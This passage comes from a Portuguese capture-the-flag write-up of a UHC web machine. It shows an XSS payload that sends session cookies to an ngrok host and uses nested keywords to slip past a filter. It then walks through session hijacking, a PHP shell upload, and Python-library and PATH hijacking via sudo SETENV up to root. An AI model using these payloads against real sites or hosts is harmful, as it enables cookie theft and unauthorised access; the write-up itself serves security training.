&lt;/scscriptript&gt;</code></pre><p id="f805e527-aa3c-439c-baa7-1b663c6ac12a" class="">Isso vai fazer com que o browser faça uma requisição para meu IP do ngrok + a porta do ngrok  com os cookies da sessão do usuário que estiver acessando a página.</p><p id="c95348ea-1de0-457b-a557-6aabde3e7fec" class="">Vamos enviar e abrir nosso netcat para receber o request.</p><p id="389653f1-4e5f-472b-8c00-a6e23f8be86b" class="">Não funcionou</p><pre id="05352d37-10b9-4b90-a9aa-3dc98bd2f2c6" class="code"><code>new Image().src=&#x27;http://2.tcp.ngrok.io:17224/&#x27;+(.);</code></pre><p id="93355025-aca1-46f6-930d-1fa82a0410d0" class="">Se analisarmos a aplicação retirou a palavra &quot;document&quot; e a palavra &quot;cookie&quot;, logo vamos fazer a mesma coisa que fizemos com script e está feito nosso bypass.</p><pre id="314ed807-d7ec-45d7-bffe-d507eddb9998" class="code"><code>&lt;scrscriptipt&gt;
new Image().src=&#x27;http://2.tcp.ngrok.io:18238/&#x27;+(docdocumentument.cookcookieie);
&lt;/scscriptript&gt;</code></pre><p id="d25438d4-8c86-4993-99d5-fc65c025ef35" class="">
</p><figure id="7be24c92-769d-41af-bd61-e2e0317dd9f8" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2016.png"><img style="width:1366px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2016.png"/></a></figure><p id="886472e9-8339-45a3-8bd4-2a7d9698afa0" class="">Agora vamos usar esse token que pegamos: (se botarmos esse token no <a href="http://jwt.io">jwt.io</a> ele vai mostrar o uid:1)</p><p id="69d316e5-e137-4fcb-8a2c-dafc7ad7dac1" class="">
</p><figure id="6fb83e89-b1da-4766-8a18-771d4cb7903e" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2017.png"><img style="width:1366px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2017.png"/></a></figure><p id="6bd9802a-3ce5-41dd-bda7-e69b0f8c80dd" class="">Mais uma Flag! Session Hijacking feito com Sucesso.</p><p id="bc457a20-0a5c-402f-add2-6955881593c7" class="">Agora temos um formulário de upload.</p><p id="543ec05b-8e06-4c99-9bb7-1aeb2126856d" class="">Pelo jeito podemos fazer o upload de php, vamos upar uma shell...</p><p id="81d52088-d62a-44be-a635-272ab3c2b955" class="">Agora vamos ver aquele diretório que o ffuf apontou o /uploads, se nossa shell está lá.</p><p id="ac8ecf76-708e-43e6-ac2b-52045167173d" class="">
</p><figure id="6b63169f-f73d-4503-a077-436638ebd096" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2018.png"><img style="width:432px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2018.png"/></a></figure><p id="d35c8218-262c-4a4e-afc8-008123f5d705" class="">Como estou escrevendo esse write-up no dia do UHC temos um load-balancer rodando, por isso vamos dar f5 algumas vezes...</p><p id="de5baa7d-baf7-49e3-8de0-001c967067f7" class="">
</p><figure id="3de36b1d-68f0-4f71-a167-e63bdacae384" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2019.png"><img style="width:1147px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2019.png"/></a></figure><p id="fc7c3898-c7d5-4f6b-b2d4-a89932d76a8d" class="">Habemos Shell !</p><h1 id="e3d5b93d-a834-4774-a50a-435fdc326ac7" class="">Pós-Exploitation</h1><h2 id="8f41cc9b-4840-4a1d-8d06-390d09677d51" class="">Part 1 </h2><p id="55ae810a-7742-49ea-986c-f6d71ae33ef5" class="">Agora que temos shell vou transforma-la numa shell mais responsiva para trabalharmos melhor...</p><p id="3eadc91c-f75e-40f8-ac0a-72be09f95501" class="">
</p><figure id="15f21242-889f-434d-931d-1de520e38822" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2020.png"><img style="width:505px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2020.png"/></a></figure><pre id="58b21d12-4ea2-4457-830e-19f2ef233cad" class="code"><code>Full tty shell
in your shell~ python3 -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;
CTRL + Z
in your terminal~ stty raw -echo; fg
ENTER
in your shell~ export TERM=xterm</code></pre><p id="f13fdbd6-f06a-4cb7-87f2-afe6ad935650" class="">
</p><p id="efc265f2-5f15-47b1-a786-ccf627898c91" class="">Agora poderemos trabalhar melhor, vamos começar dando uma olhada na máquina, parece que temos dois users, um chamado ronald e outro leia (estamos como o user do apache www-data), e no / temos um arquivo chamado welcome.txt</p><p id="472c1ffc-c70d-4fd3-9f10-d6ea03881c03" class="">
</p><figure id="d7de2093-2932-4a1f-aa65-718a28ab98e5" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2021.png"><img style="width:578px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2021.png"/></a></figure><p id="9f5e90f2-d9ee-4e52-b670-6ad778ff5fd8" class="">Parece a senha do ronald, agora vamos logar como ronald, e logo na home dele temos mais uma flag!</p><p id="fe4985b3-4c86-42d9-a130-cacb86747038" class="">
</p><figure id="dcf03158-08be-4449-abec-a9bf2871cabf" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2022.png"><img style="width:337px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2022.png"/></a></figure><p id="f5ff889c-9d43-477d-b94e-9ff43321bacb" class="">Ok, pelo o que parece teremos que fazer uma escalação de privilégios horizontal e pegar o user da leia.</p><p id="ccb94755-d198-4222-90da-3335c9a4744c" class="">Poderíamos rodar um linpeas para enumerar, mas logo no &quot;sudo -l&quot; já temos algo interessante:</p><p id="1daf39b1-2b21-41a6-8dcc-5cb62122d346" class="">
</p><figure id="94ed1568-4ac3-4221-9ffc-bd74bbbc8ed6" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2023.png"><img style="width:714px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2023.png"/></a></figure><p id="c1944d7d-5a30-413b-8231-b04476744246" class="">Isso significa que com o user ronald podemos rodar /usr/bin/python3.7 /opt/bingo.py setando uma variável de ambiente sem usar senha como o user leia.</p><p id="362d9dcc-51ce-493f-9195-ec4f613ea395" class="">Isso está com cara de Python Lib Hijacking</p><p id="f57f7efe-5f35-40af-b06b-c33e5c572311" class="">Vamos então ler esse script <a href="http://bingo.py">bingo.py</a>...</p><h3 id="57e2a4c8-8993-4793-8082-e9e6b6c6d1d9" class="">Python Lib Hijacking</h3><figure id="1103255e-8050-4f6b-b764-99e08bf556a6"><a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">Linux Privilege Escalation</div><div class="bookmark-description">If you have write permissions on any folder inside the PATH variable you may be able to hijacking some libraries or binaries: Note that these commands will show a lot of information that will mostly be useless, therefore it&#x27;s recommended some application like OpenVAS or similar that will check if any installed software version is vulnerable to known exploits Always check for possible .</div></div><div class="bookmark-href"><img src="https://gblobscdn.gitbook.com/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Favatar.png?alt=media" class="icon bookmark-icon"/>https://book.hacktricks.xyz/linux-unix/privilege-escalation</div></div><img src="https://app.gitbook.com/share/space/thumbnail/-L_2uGJGU7AVNRcqRvEi.png" class="bookmark-image"/></a></figure><figure id="59242a72-1d18-4406-990a-96de9629c89d" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2024.png"><img style="width:631px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2024.png"/></a></figure><p id="a27265cd-7dd0-4726-80d5-0e1d78515028" class="">
</p><p id="7e0c398e-1cae-43c3-ae1f-1247e89073d1" class="">O básico de Python LIb Hijacking é sobre escrever uma das bibliotecas importadas no script, no caso vamos usar a socketserver...</p><p id="3fd5ba03-c5a3-4f37-a7e0-044d83740ed2" class="">Criei uma pasta oculta no /tmp para nao leakar o exploit no meio do campeonato...</p><figure id="38d3604d-3fb9-448c-b797-25db924983b8" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2025.png"><img style="width:460px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2025.png"/></a></figure><p id="df28876c-28a7-4766-bc23-c1d58fd3997f" class="">Escrevi um script com uma função chamando uma shell interativa, assim quando rodarmos o <a href="http://bingo.py">bingo.py</a> como a leia, o bingo.py importará a nossa lib fake chamando uma shell como a leia. Mas como fazemos o python entender que é para usar a nossa lib? O SETENV no /etc/sudoers significa que podemos dizer o valor de alguma variável de ambiente do linux, e existe uma variável de ambiente que diz onde ficam os arquivos do python incluindo as libs, então temos só que dizer que esse diretório é o nosso /tmp/.a/ .</p><p id="5547f31c-0842-460f-b904-31a2aafc0cab" class="">
</p><figure id="4abfaf76-9abb-42f1-b4e4-e2cc96214126" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2026.png"><img style="width:859px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2026.png"/></a></figure><p id="5aa7098d-82fe-4ffe-a40d-a264929962c8" class="">Gooooood</p><p id="6b282fa6-d671-489b-948e-63b2cb6f5389" class="">
</p><p id="62d6d768-3c28-4eef-876d-0254c9cc75fe" class="">Agora como a leia podemos ver que a próxima flag estava na home dela.</p><p id="bd121e7c-27b8-40a2-abad-f4fc9a0ce1a3" class="">
</p><figure id="64f77285-e8a4-4865-88b7-81018d338bc8" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2027.png"><img style="width:492px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2027.png"/></a></figure><p id="b3455886-416c-476b-b3e8-89d1c29c08b5" class="">
</p><h2 id="042afb29-70e6-447f-93e4-3e676854c91b" class="">Part 2 - Root</h2><p id="be46b16c-61df-4012-b71d-4342b67227ed" class="">Poderia ter rodado o linpeas mas novamente o &quot;sudo -l&quot; nos disse algo:</p><figure id="f27ffee9-7d4f-4045-9b88-e44fa88a5f85" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2028.png"><img style="width:741px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2028.png"/></a></figure><p id="777640f5-7ed4-41bb-ac17-08e2367f3d8f" class="">Isso significa que o user leia pode rodar /bin/sl como root sem senha e setando uma variável de ambiente...</p><p id="72747c67-d755-481d-afa7-9e0bae319d67" class="">Vamos ver esse sl.</p><h3 id="2d1ae170-f72e-4036-9525-dd3cf8704514" class="">Path Hijacking</h3><p id="6b1f12aa-7b95-423f-ba8b-307f7ee38d27" class="">
</p><figure id="587c07b4-1300-4919-964b-f8b7f0ca00f5" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2029.png"><img style="width:576px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2029.png"/></a></figure><p id="42e997d9-d6db-4ad3-9d78-0e1efea4f26e" class="">LOL, Aparentemente ele faz um trem no terminal.</p><p id="9c4463ba-88fe-449a-89cd-6ca6dbbbcc67" class="">Mas logo quando ele termina de passar o trem ele mostra um output um tanto quanto conhecido</p><p id="b11f3ec8-a7c8-4536-98cf-695c82ab8a25" class="">
</p><figure id="9a1be4b5-3a96-4d32-bf42-6d587baac45a" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2030.png"><img style="width:263px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2030.png"/></a></figure><p id="25ab3ca5-88b3-457b-84d1-3793a07592dd" class="">Parece que ele está rodando um ls...</p><p id="2671c813-9b5e-4642-b1f3-33c62906ec80" class="">Tudo indica que seja Path Hijacking, vou rodar o strace no sl para ver as chamadas de sistema para confirmar...</p><figure id="d88ec90b-d9b6-404a-bef9-50b53cebc788" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/unknown.png"><img style="width:881px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/unknown.png"/></a></figure><p id="713ae970-f302-4d4a-bf41-aa567357be50" class="">É ele está chamando o &quot;ls&quot; direto sem path, ou seja podemos manipular a variável PATH usando nosso SETENV, PATH é a variável que determina onde os arquivos executáveis do linux estão. Por exemplo para não digitar &quot;/usr/bin/sudo&quot; meu PATH terá &quot;/usr/bin/&quot; assim quando eu for rodar o comando &quot;sudo&quot; eu só preciso digitar &quot;sudo&quot;.</p><p id="ec74873e-62ab-4bd4-9c7c-6510c094962f" class="">Então temos que criar um ls malicioso...</p><p id="40d76016-4ff1-44dd-8b7a-1d9332dbdc53" class="">Usei o mesmo path que usamos para o python lib hijacking.</p><p id="5e242b62-943e-4f22-ad42-25434ccfac49" class="">
</p><figure id="85358847-8424-460b-93f2-4082c72cbbe1" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2031.png"><img style="width:356px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2031.png"/></a></figure><p id="40e37230-db95-43d5-a983-5e79ecb0e26f" class="">
</p><p id="a7081a0f-14f5-4eca-804c-293a6a1f4e4c" class="">Escrevi um bash para apenas rodar um /bin/bash e chamar a shell interativa como root</p><p id="68ae0311-a028-46f1-9700-f801f8954160" class="">Agora o root...</p><p id="58ae0b66-99a9-41f8-a968-07bbf3720814" class="">
</p><figure id="efdf9642-01ac-425d-bc72-1e637c4f0303" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2032.png"><img style="width:544px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2032.png"/></a></figure><p id="cec9af65-62a9-4011-afef-abe13f56be1e" class="">E nossa flag de root merecida!</p><p id="6ae25b2f-f12b-4481-a1a3-10fb49f9e4bd" class="">
</p><figure id="736eb5bf-d456-4d01-874d-c6d5ca67c8ed" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2033.png"><img style="width:563px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2033.png"/></a></figure><p id="d13afb9c-f47c-49cc-afde-e13b427deb5b" class="">É isso.</p><p id="ee7b3aeb-dbcd-474f-a11b-a8cec99dbe2a" class="">
</p><p id="cb8f1419-61a4-41d3-80a9-b7e64de90717" class="">Essa foi a primeira maquina que eu fiz então espero que quem tenha jogado tenha gostado e sim eu sou fã de star wars, tem varios easter eggs espalhados na máquina kkskksks...</p><p id="2ac968ba-dd73-4d20-a3f7-a9eacee07515" class="">
</p></div></article></body></html>